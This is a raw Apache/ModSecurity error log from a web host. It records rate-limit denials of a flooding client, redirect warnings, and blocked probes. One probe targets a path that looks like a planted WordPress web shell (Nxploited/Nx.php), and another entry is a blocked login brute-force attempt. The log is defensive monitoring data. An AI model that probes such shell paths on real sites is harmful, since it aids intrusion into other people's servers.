[Tue May 26 19:59:42.373296 2026] [security2:error] [pid 93576:tid 93772] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVWDRMqfxdEDkoszz6gAAADw"]
[Tue May 26 19:59:42.377216 2026] [security2:error] [pid 106517:tid 106677] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVYZZc2DoU1lPnP1RlAAAAKA"]
[Tue May 26 19:59:42.389815 2026] [security2:error] [pid 93576:tid 93729] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVWDRMqfxdEDkoszz7AAAABE"]
[Tue May 26 19:59:42.389961 2026] [security2:error] [pid 93868:tid 94305] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVUqK9k_ZUB2Vp259sQAAAb4"]
[Tue May 26 19:59:42.395855 2026] [security2:error] [pid 93868:tid 94266] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVUqK9k_ZUB2Vp259sAAAAZc"]
[Tue May 26 19:59:42.398792 2026] [security2:error] [pid 93576:tid 93789] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVWDRMqfxdEDkoszz6AAAAE0"]
[Tue May 26 19:59:42.398865 2026] [security2:error] [pid 93868:tid 94357] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVUqK9k_ZUB2Vp259xwAAAfI"]
[Tue May 26 19:59:42.408376 2026] [security2:error] [pid 93868:tid 94323] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVUqK9k_ZUB2Vp2590AAAAdA"]
[Tue May 26 19:59:42.416084 2026] [security2:error] [pid 106517:tid 106767] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVYZZc2DoU1lPnP1RoQAAAPk"]
[Tue May 26 19:59:42.429865 2026] [security2:error] [pid 93868:tid 94312] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVUqK9k_ZUB2Vp259zAAAAcU"]
[Tue May 26 19:59:42.430806 2026] [security2:error] [pid 106517:tid 106653] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVYZZc2DoU1lPnP1RnwAAAIg"]
[Tue May 26 19:59:42.439532 2026] [security2:error] [pid 106517:tid 106716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVYZZc2DoU1lPnP1RnQAAAMY"]
[Tue May 26 19:59:42.445006 2026] [security2:error] [pid 93868:tid 94270] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVUqK9k_ZUB2Vp259wwAAAZs"]
[Tue May 26 19:59:42.448295 2026] [security2:error] [pid 93868:tid 94358] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVUqK9k_ZUB2Vp2590gAAAfM"]
[Tue May 26 19:59:42.556557 2026] [qos:error] [pid 93576:tid 93818] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuVmDRMqfxdEDkosz0XAAAAGo
[Tue May 26 19:59:42.558566 2026] [qos:error] [pid 93868:tid 94264] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVkqK9k_ZUB2Vp25-IQAAAZU
[Tue May 26 19:59:42.558958 2026] [qos:error] [pid 93576:tid 93716] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuVmDRMqfxdEDkosz0XgAAAAQ
[Tue May 26 19:59:42.560613 2026] [qos:error] [pid 93868:tid 94276] [client 45.148.10.120:35250] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVkqK9k_ZUB2Vp25-IgAAAaE
[Tue May 26 19:59:42.561840 2026] [qos:error] [pid 93868:tid 94377] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuVkqK9k_ZUB2Vp25-IwAAAgY
[Tue May 26 19:59:42.568857 2026] [qos:error] [pid 93576:tid 93736] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVmDRMqfxdEDkosz0XwAAABg
[Tue May 26 19:59:42.569100 2026] [security2:error] [pid 93576:tid 93728] [client 103.163.220.32:22237] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wpx/"] [unique_id "ahWuVmDRMqfxdEDkosz0YAAAABA"]
[Tue May 26 19:59:42.593980 2026] [qos:error] [pid 93576:tid 93803] [client 45.148.10.120:35150] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVmDRMqfxdEDkosz0YgAAAFs
[Tue May 26 19:59:42.601858 2026] [qos:error] [pid 93868:tid 94341] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuVkqK9k_ZUB2Vp25-KAAAAeI
[Tue May 26 19:59:42.601862 2026] [qos:error] [pid 93868:tid 94351] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWuVkqK9k_ZUB2Vp25-KQAAAew
[Tue May 26 19:59:42.602339 2026] [qos:error] [pid 93576:tid 93816] [client 45.148.10.120:35160] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVmDRMqfxdEDkosz0ZAAAAGg
[Tue May 26 19:59:42.708276 2026] [qos:error] [pid 93576:tid 93784] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVmDRMqfxdEDkosz0ZwAAAEg
[Tue May 26 19:59:42.712097 2026] [qos:error] [pid 93868:tid 94352] [client 45.148.10.120:35250] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVkqK9k_ZUB2Vp25-LgAAAe0
[Tue May 26 19:59:42.713757 2026] [qos:error] [pid 93868:tid 94289] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVkqK9k_ZUB2Vp25-LwAAAa4
[Tue May 26 19:59:42.722934 2026] [qos:error] [pid 93868:tid 94329] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVkqK9k_ZUB2Vp25-MQAAAdY
[Tue May 26 19:59:42.723152 2026] [qos:error] [pid 93576:tid 93722] [client 45.148.10.120:35390] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVmDRMqfxdEDkosz0aAAAAAo
[Tue May 26 19:59:42.723699 2026] [qos:error] [pid 93576:tid 93801] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVmDRMqfxdEDkosz0aQAAAFk
[Tue May 26 19:59:42.748255 2026] [qos:error] [pid 93576:tid 93836] [client 45.148.10.120:35150] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVmDRMqfxdEDkosz0agAAAHw
[Tue May 26 19:59:42.750297 2026] [qos:error] [pid 93576:tid 93714] [client 45.148.10.120:35160] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVmDRMqfxdEDkosz0awAAAAI
[Tue May 26 19:59:42.755799 2026] [qos:error] [pid 93576:tid 93830] [client 45.148.10.120:35186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVmDRMqfxdEDkosz0bAAAAHY
[Tue May 26 19:59:42.759981 2026] [qos:error] [pid 93868:tid 94356] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVkqK9k_ZUB2Vp25-MwAAAfE
[Tue May 26 19:59:42.848253 2026] [security2:error] [pid 93868:tid 94320] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuVkqK9k_ZUB2Vp259_wAAAc0"]
[Tue May 26 19:59:42.857532 2026] [qos:error] [pid 93576:tid 93772] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVmDRMqfxdEDkosz0bgAAADw
[Tue May 26 19:59:42.866479 2026] [qos:error] [pid 93868:tid 94291] [client 45.148.10.120:35250] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVkqK9k_ZUB2Vp25-NgAAAbA
[Tue May 26 19:59:42.868756 2026] [qos:error] [pid 93868:tid 94305] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVkqK9k_ZUB2Vp25-NwAAAb4
[Tue May 26 19:59:42.874513 2026] [qos:error] [pid 93868:tid 94258] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVkqK9k_ZUB2Vp25-OAAAAY8
[Tue May 26 19:59:42.877054 2026] [qos:error] [pid 93576:tid 93767] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVmDRMqfxdEDkosz0bwAAADc
[Tue May 26 19:59:42.890025 2026] [qos:error] [pid 93576:tid 93819] [client 45.148.10.120:35390] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVmDRMqfxdEDkosz0cAAAAGs
[Tue May 26 19:59:42.903193 2026] [qos:error] [pid 93576:tid 93828] [client 45.148.10.120:35150] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVmDRMqfxdEDkosz0cgAAAHQ
[Tue May 26 19:59:42.903425 2026] [qos:error] [pid 93576:tid 93731] [client 45.148.10.120:35160] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVmDRMqfxdEDkosz0cwAAABM
[Tue May 26 19:59:42.909723 2026] [qos:error] [pid 93576:tid 93729] [client 45.148.10.120:35186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVmDRMqfxdEDkosz0dAAAABE
[Tue May 26 19:59:42.913507 2026] [qos:error] [pid 93868:tid 94311] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuVkqK9k_ZUB2Vp25-OwAAAcQ
[Tue May 26 19:59:43.006814 2026] [qos:error] [pid 93576:tid 93732] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV2DRMqfxdEDkosz0dgAAABQ
[Tue May 26 19:59:43.018046 2026] [qos:error] [pid 93868:tid 94357] [client 45.148.10.120:35250] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV0qK9k_ZUB2Vp25-PgAAAfI
[Tue May 26 19:59:43.026182 2026] [qos:error] [pid 93868:tid 94315] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV0qK9k_ZUB2Vp25-PwAAAcg
[Tue May 26 19:59:43.026405 2026] [qos:error] [pid 93868:tid 94382] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV0qK9k_ZUB2Vp25-QAAAAgs
[Tue May 26 19:59:43.028553 2026] [qos:error] [pid 93576:tid 93712] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV2DRMqfxdEDkosz0dwAAAAA
[Tue May 26 19:59:43.043887 2026] [qos:error] [pid 93576:tid 93789] [client 45.148.10.120:35390] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV2DRMqfxdEDkosz0eAAAAE0
[Tue May 26 19:59:43.056673 2026] [qos:error] [pid 93576:tid 93804] [client 45.148.10.120:35150] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV2DRMqfxdEDkosz0egAAAFw
[Tue May 26 19:59:43.057067 2026] [qos:error] [pid 93576:tid 93770] [client 45.148.10.120:35160] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV2DRMqfxdEDkosz0eQAAADo
[Tue May 26 19:59:43.063658 2026] [qos:error] [pid 93576:tid 93744] [client 45.148.10.120:35186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV2DRMqfxdEDkosz0ewAAACA
[Tue May 26 19:59:43.067151 2026] [qos:error] [pid 93868:tid 94323] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV0qK9k_ZUB2Vp25-QQAAAdA
[Tue May 26 19:59:43.073978 2026] [security2:error] [pid 93868:tid 94343] [client 103.163.220.35:63529] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/plugins/Nxploited/Nx.php"] [unique_id "ahWuV0qK9k_ZUB2Vp25-QgAAAeQ"]
[Tue May 26 19:59:43.118604 2026] [security2:error] [pid 93868:tid 94074] [remote 103.95.119.103:40292] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWuVkqK9k_ZUB2Vp25-PAACChs"]
[Tue May 26 19:59:43.156453 2026] [qos:error] [pid 93576:tid 93759] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV2DRMqfxdEDkosz0fQAAAC8
[Tue May 26 19:59:43.169434 2026] [qos:error] [pid 93868:tid 94290] [client 45.148.10.120:35250] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV0qK9k_ZUB2Vp25-RAAAAa8
[Tue May 26 19:59:43.178346 2026] [qos:error] [pid 93868:tid 94297] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV0qK9k_ZUB2Vp25-RQAAAbY
[Tue May 26 19:59:43.181291 2026] [qos:error] [pid 93576:tid 93753] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV2DRMqfxdEDkosz0gAAAACk
[Tue May 26 19:59:43.182025 2026] [qos:error] [pid 93868:tid 94312] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV0qK9k_ZUB2Vp25-RgAAAcU
[Tue May 26 19:59:43.201078 2026] [qos:error] [pid 93576:tid 93754] [client 45.148.10.120:35390] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV2DRMqfxdEDkosz0ggAAACo
[Tue May 26 19:59:43.205003 2026] [qos:error] [pid 93576:tid 93718] [client 45.148.10.120:35160] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV2DRMqfxdEDkosz0gwAAAAY
[Tue May 26 19:59:43.210454 2026] [qos:error] [pid 93576:tid 93764] [client 45.148.10.120:35150] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV2DRMqfxdEDkosz0hAAAADQ
[Tue May 26 19:59:43.219992 2026] [qos:error] [pid 93576:tid 93740] [client 45.148.10.120:35186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV2DRMqfxdEDkosz0hQAAABw
[Tue May 26 19:59:43.221572 2026] [qos:error] [pid 93868:tid 94267] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV0qK9k_ZUB2Vp25-RwAAAZg
[Tue May 26 19:59:43.280006 2026] [security2:error] [pid 93868:tid 94285] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVUqK9k_ZUB2Vp2595AAAAao"]
[Tue May 26 19:59:43.282194 2026] [security2:error] [pid 93868:tid 94314] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVUqK9k_ZUB2Vp2591AAAAcc"]
[Tue May 26 19:59:43.285863 2026] [security2:error] [pid 93576:tid 93734] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVWDRMqfxdEDkoszz5wAAABY"]
[Tue May 26 19:59:43.286300 2026] [security2:error] [pid 106517:tid 106748] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVYZZc2DoU1lPnP1RogAAAOY"]
[Tue May 26 19:59:43.309489 2026] [security2:error] [pid 93868:tid 94364] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVUqK9k_ZUB2Vp2594QAAAfk"]
[Tue May 26 19:59:43.311767 2026] [security2:error] [pid 93868:tid 94319] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVUqK9k_ZUB2Vp2592gAAAcw"]
[Tue May 26 19:59:43.312874 2026] [security2:error] [pid 93868:tid 94302] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVUqK9k_ZUB2Vp2594AAAAbs"]
[Tue May 26 19:59:43.319377 2026] [security2:error] [pid 106517:tid 106688] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVoZZc2DoU1lPnP1R4QAAAKo"]
[Tue May 26 19:59:43.323397 2026] [security2:error] [pid 106517:tid 106776] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVYZZc2DoU1lPnP1RoAAAAQI"]
[Tue May 26 19:59:43.323740 2026] [security2:error] [pid 106517:tid 106664] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVYZZc2DoU1lPnP1RpwAAAJM"]
[Tue May 26 19:59:43.325832 2026] [security2:error] [pid 93868:tid 94310] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVUqK9k_ZUB2Vp2592wAAAcM"]
[Tue May 26 19:59:43.331733 2026] [security2:error] [pid 106517:tid 106672] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVYZZc2DoU1lPnP1RpgAAAJs"]
[Tue May 26 19:59:43.336157 2026] [security2:error] [pid 93868:tid 94325] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVUqK9k_ZUB2Vp2592QAAAdI"]
[Tue May 26 19:59:43.341371 2026] [security2:error] [pid 106517:tid 106699] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVYZZc2DoU1lPnP1RsgAAALU"]
[Tue May 26 19:59:43.342743 2026] [security2:error] [pid 93868:tid 94355] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVUqK9k_ZUB2Vp2593QAAAfA"]
[Tue May 26 19:59:43.342944 2026] [security2:error] [pid 106517:tid 106759] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVYZZc2DoU1lPnP1RuwAAAPE"]
[Tue May 26 19:59:43.343784 2026] [security2:error] [pid 106517:tid 106697] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVoZZc2DoU1lPnP1R3gAAALM"]
[Tue May 26 19:59:43.362292 2026] [security2:error] [pid 93576:tid 93835] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVmDRMqfxdEDkosz0NQAAAHs"]
[Tue May 26 19:59:43.364380 2026] [security2:error] [pid 106517:tid 106774] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVoZZc2DoU1lPnP1R2QAAAQA"]
[Tue May 26 19:59:43.366247 2026] [security2:error] [pid 93868:tid 94333] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVkqK9k_ZUB2Vp259_QAAAdo"]
[Tue May 26 19:59:43.373059 2026] [security2:error] [pid 93576:tid 93813] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVmDRMqfxdEDkosz0LwAAAGU"]
